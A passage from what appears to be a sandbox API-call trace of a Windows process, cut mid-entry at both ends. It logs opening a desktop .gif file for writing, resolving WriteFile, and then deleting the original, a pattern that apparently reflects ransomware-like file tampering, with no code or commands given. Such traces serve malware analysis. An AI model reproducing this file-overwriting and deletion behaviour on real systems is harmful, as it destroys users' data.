12 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0166.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0166.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r4ko9w2zwntiqwljh0er.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0166.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0166.917] FreeLibrary (hLibModule=0x75990000) returned 1 [0166.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0166.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0166.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0166.917] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0166.917] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0166.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0166.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0166.918] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0166.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0166.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0166.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd960 [0166.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd960, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0166.920] FreeLibrary (hLibModule=0x75990000) returned 1 [0166.920] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0166.920] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0166.920] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0166.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0166.920] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0166.920] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0166.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0166.921] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0166.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0166.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0166.921] FreeLibrary (hLibModule=0x75990000) returned 1 [0166.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0166.922] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0166.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0166.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0166.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpFilePart=0x0) returned 0x3e [0166.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0x8e9c960, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 0x90af58 [0166.924] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r4ko9w2zwntiqwljh0er.gif")) returned 1 [0166.927] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0x8e9c960, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 0 [0166.927] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0166.927] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0166.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0166.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0166.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0166.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0166.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0166.930] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0166.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0166.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0166.931] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0166.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0166.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0166.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0166.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0166.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0166.931] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0166.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0166.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0166.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0166.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.933] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 